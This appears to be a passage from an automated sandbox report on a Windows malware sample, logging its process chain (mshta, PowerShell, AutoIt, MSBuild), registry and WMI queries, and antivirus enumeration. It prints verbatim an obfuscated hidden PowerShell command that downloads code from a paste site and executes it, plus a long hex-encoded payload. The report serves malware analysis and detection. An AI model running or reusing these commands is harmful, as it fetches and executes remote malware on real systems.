cgmqb('619c354d6db9f3f484d11e37f9a5c98ca2c67ad44869dad2a1b050859a2f64301d2176e5e02553ec057b7defe977761f13ec3b821fd2bf7b61a2835f048aadb9d53ea5090c8a4909936162d4e888edae5c2805a7b7078c416e9eba91a7737860e61cda680064beac6c3b43d4a742cbc7650066b7009f6eed14e649bfe5141bc6820331279b1d91d1afb9a002d60b1142e4ba80436c1acbdf43f77d145a1ae776b79bbdc6b49934e8485ce19389f13ed554b250d9069caaa26c8f20afa47b2981f495265e62e718988b04fbec2faf9362fccfc8295b4ff36fdf66dc47036b18cf402a773f7eb30cf918cc3523247bc946dd3c5116428886f846518591a5473c4029c6021c9d2e4dc7ec2b2f826cb99917ae10c1e8e375c6dd683272b3a957825ddc8cc3e570e90eaf546e09707a8515195ee8896646e1ac066e5bd2875f82393034b362ab91c9724851b205b4a02975e1b921526387ab1ccf8496b8225171653b45d000624d31ebb8a75e93a4faea1da654cbbd9f01209d48530bdf0222a13a588a75e568b18065fa2534b0792938b38475abe2bbfa3d79293144e35126501b0636b6c131b9a7e78357b3cafd6d6ffbfb82f95f053407bd8b91dd016719170a36d88538050ae80a028d7c65871924a588285ab0798b124073a5337b6c7c9f6d791f852f957a88c51cdd5286c788ee800f41905a22d4f3c546eed053c37ca81fac085a0604145517e387f89209637f36cbdfe3efa22d81d023e26b486f415a9f60513e1f044ba938ba37a749a7d64e606f389cea95ede63fe4d4d0b5318e94946b345978b806eb97baa7317f0d66441555cd8b0498cbce4563f27417415532a59009f12d93486baa576d66e1a94c2fcf0aff4d97ff6ac0ded5ae9dd1c28bc9fb4b7b32ebae00e90301c7b10fb256981821ba7d05e59142ed2b63daf46e3f14731a7ee68fda15c0ecb85076d5d3c1627ffecc12a8ab2afa5dcfb028e118d7c7e65f6bddcc94632d5131d101d2d1ad09c79df3500abc5ca72110f7fb629e9784a340da2f69c7ef41790c7ecf578195a0226541aa005b9576c5db3ec2d21e43ad093c6007db20f96d752ddd4cb39bb4b44576d7df95f0dd75240b1b45d12ad14dd1c62d252b89e4c3f6d7ea6db64acd483a82db456666ddb4e66a704027aac5243d0fef1723b6bfba2507b09b620e2e05aeba95c5c15912f9762fe744c407625420e36c579137b8da48e8b2b3d9ceb9ea7d17af1140852299ade0a8b44c9f5b84185e999db924ca89e2381f4c206a8c9aa660f47b148421eb0ba7ebf85a7241c5492982e4137425c91ba9c5dfb91e9ce1808cd8f1a495db03460fa132e80e1b3e0be5a128f98183612928708bd201626624b297a12880537a327369fd4e4910da3fd868cd9ebe5bd79c8442ce12c6c58d0b69ba72e4ed3eaf25028c786f3071cdd15675e2cde5136736e09a963f3819a8e5cd1d162cff51d8a4c10143b9819a2fb97a69508dafc4323924544b31ff36bbafc96f545abece3235e2ffa3205157dd1ebae29cd05bab7a53396acb35f7f234057291f2fd7a472a2618edc0995e36672ac725de56e49af3edf3d49dabeb7c2e83cd39e4a1e4fd35c3ae52263b5ea0b9c94c447fbb37466e6efc8913cdae17bfff7b13ae3dd38f2d855590bf0f8e86c627d41df7ad14a562c3e7585030d97bc4b00d705840832c3e7a736a65b9a5df8180343a6943d342be79d729d85c9670dbba11668a04d31f4257b8ac87e18dd94cace14a949c27e6ccf7b24407ae865a3f706e6c802e46acd0ee5590e5662c7f9e7f0f86445a3d9a74256659eb54c1efab0842363e035766605e44b0a632498b42df7071a7bee137394b4be7714c9295a3bbcbc40acf9ef837543fb9abbbda25577adb9b87b50d5270e313c6d8e4f78f5e0a28f4aa66fc9fefcf3ec4c1ef59ef0fdde684cee62fdcfb62d4eba5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command cd;set-variable t8 (.(get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'cmt'}).name).invoke((get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'gome'}).name).invoke('nect',$true,1))net.webclient);sv s 'https://nopaste.net/sfhgtxfgtb';&(get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'cmt'}).name).invoke((get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'gome'}).name).invoke('in-exion',$true,$true))([string]::join('',(((get-item variable:\t8).value.((((get-item variable:\t8).value\|get-member)\|where-object{(get-variable _).value.name-ilike'nl*a'}).name).invoke((gci variable:\s).value)\|foreach{(get-item variable:/_).value-as'char'}))))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cgmqb($seve){return -split ($seve -replace '..', '0x$& ')};$qbrr = cgmqb('619c354d6db9f3f484d11e37f9a5c98ca2c67ad44869dad2a1b050859a2f64301d2176e5e02553ec057b7defe977761f13ec3b821fd2bf7b61a2835f048aadb9d53ea5090c8a4909936162d4e888edae5c2805a7b7078c416e9eba91a7737860e61cda680064beac6c3b43d4a742cbc7650066b7009f6eed14e649bfe5141bc6820331279b1d91d1afb9a002d60b1142e4ba80436c1acbdf43f77d145a1ae776b79bbdc6b49934e8485ce19389f13ed554b250d9069caaa26c8f20afa47b2981f495265e62e718988b04fbec2faf9362fccfc8295b4ff36fdf66dc47036b18cf402a773f7eb30cf918cc3523247bc946dd3c5116428886f846518591a5473c4029c6021c9d2e4dc7ec2b2f826cb99917ae10c1e8e375c6dd683272b3a957825ddc8cc3e570e90eaf546e09707a8515195ee8896646e1ac066e5bd2875f82393034b362ab91c9724851b205b4a02975e1b921526387ab1ccf8496b8225171653b45d000624d31ebb8a75e93a4faea1da654cbbd9f01209d48530bdf0222a13a588a75e568b18065fa2534b0792938b38475abe2bbfa3d79293144e35126501b0636b6c131b9a7e78357b3cafd6d6ffbfb82f95f053407bd8b91dd016719170a36d88538050ae80a028d7c65871924a588285ab0798b124073a5337b6c7c9f6d791f852f957a88c51cdd5286c788ee800f41905a22d4f3c546eed053c37ca81fac085a0604145517e387f89209637f36cbdfe3efa22d81d023e26b486f415a9f60513e1f044ba938ba37a749a7d64e606f389cea95ede63fe4d4d0b5318e94946b345978b806eb97baa7317f0d66441555cd8b0498cbce4563f27417415532a59009f12d93486baa576d66e1a94c2fcf0aff4d97ff6ac0ded5ae9dd1c28bc9fb4b7b32ebae00e90301c7b10fb256981821ba7d05e59142ed2b63daf46e3f14731a7ee68fda15c0ecb85076d5d3c1627ffecc12a8ab2afa5dcfb028e118d7c7e65f6bddcc94632d5131d101d2d1ad09c79df3500abc5ca72110f7fb629e9784a340da2f69c7ef41790c7ecf578195a0226541aa005b9576c5db3ec2d21e43ad093c6007db20f96d752ddd4cb39bb4b44576d7df95f0dd75240b1b45d12ad14dd1c62d252b89e4c3f6d7ea6db64acd483a82db456666ddb4e66a704027aac5243d0fef1723b6bfba2507b09b620e2e05aeba95c5c15912f9762fe744c407625420e36c579137b8da48e8b2b3d9ceb9ea7d17af1140852299ade0a8b44c9f5b84185e999db924ca89e2381f4c206a8c9aa660f47b148421eb0ba7ebf85a7241c5492982e4137425c91ba9c5dfb91e9ce1808cd8f1a495db03460fa132e80e1b3e0be5a128f98183612928708bd201626624b297a12880537a327369fd4e4910da3fd868cd9ebe5bd79c8442ce12c6c58d0b69ba72e4ed3eaf25028c786f3071cdd15675e2cde5136736e09a963f3819a8e5cd1d162cff51d8a4c10143b9819a2fb97a69508dafc4323924544b31ff36bbafc96f545abece3235e2ffa3205157dd1ebae29cd05bab7a53396acb35f7f234057291f2fd7a472a2618edc0995e36672ac725de56e49af3edf3d49dabeb7c2e83cd39e4a1e4fd35c3ae52263b5ea0b9c94c447fbb37466e6efc8913cdae17bfff7b13ae3dd38f2d855590bf0f8e86c627d41df7ad14a562c3e7585030d97bc4b00d705840832c3e7a736a65b9a5df8180343a6943d342be79d729d85c9670dbba11668a04d31f4257b8ac87e18dd94cace14a949c27e6ccf7b24407ae865a3f706e6c802e46acd0ee5590e5662c7f9e7f0f86445a3d9a74256659eb54c1efab0842363e035766605e44b0a632498b42df7071a7bee137394b4be7714c9295a3bbcbc40acf9ef837543fb9abbbda25577adb9b87b50d5270e313c6d8e4f78f5e0a28f4aa66fc9fefcf3ec4c1ef59ef0fdde684cee62fdcfb62d4eba5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command cd;set-variable t8 (.(get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'cmt'}).name).invoke((get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'gome'}).name).invoke('nect',$true,1))net.webclient);sv s 'https://nopaste.net/sfhgtxfgtb';&(get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'cmt'}).name).invoke((get-childitem variable:\eonte).value.invokecommand.(((get-childitem variable:\eonte).value.invokecommand\|get-member\|where-object{(get-variable _).value.name-ilike'gome'}).name).invoke('in-exion',$true,$true))([string]::join('',(((get-item variable:\t8).value.((((get-item variable:\t8).value\|get-member)\|where-object{(get-variable _).value.name-ilike'nl*a'}).name).invoke((gci variable:\s).value)\|foreach{(get-item variable:/_).value-as'char'}))))	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

27_2_00C088CD

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C14F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

27_2_00C14F1C

Source: updater.exe, 0000001B.00000002.1706860241.0000000005E41000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: updater.exe, AutoIt3.exe	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q/explorer.exe &&& Program Manager &&& [WIN]rt-
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerte

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BD885B cpuid

27_2_00BD885B

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_017B21C5
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: GetLocaleInfoA,	27_2_017B7149
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: GetLocaleInfoA,	27_2_017B7195
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_017B22CF
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: GetLocaleInfoA,GetACP,	27_2_017B86E1
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: GetLocaleInfoA,	27_2_017B2AE9
Source: C:\faggbgb\AutoIt3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	29_2_018A20FD
Source: C:\faggbgb\AutoIt3.exe	Code function: GetLocaleInfoA,	29_2_018A7081
Source: C:\faggbgb\AutoIt3.exe	Code function: GetLocaleInfoA,	29_2_018A70CD
Source: C:\faggbgb\AutoIt3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	29_2_018A2207
Source: C:\faggbgb\AutoIt3.exe	Code function: GetLocaleInfoA,GetACP,	29_2_018A8619
Source: C:\faggbgb\AutoIt3.exe	Code function: GetLocaleInfoA,	29_2_018A2A21

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\faggbgb\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\faggbgb\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\faggbgb\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\faggbgb\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\faggbgb\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\faggbgb\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\faggbgb\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\faggbgb\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BF0030 GetLocalTime,__swprintf,

27_2_00BF0030

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BF0722 GetUserNameW,

27_2_00BF0722

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BE416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

27_2_00BE416A

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BC5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

27_2_00BC5D13

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
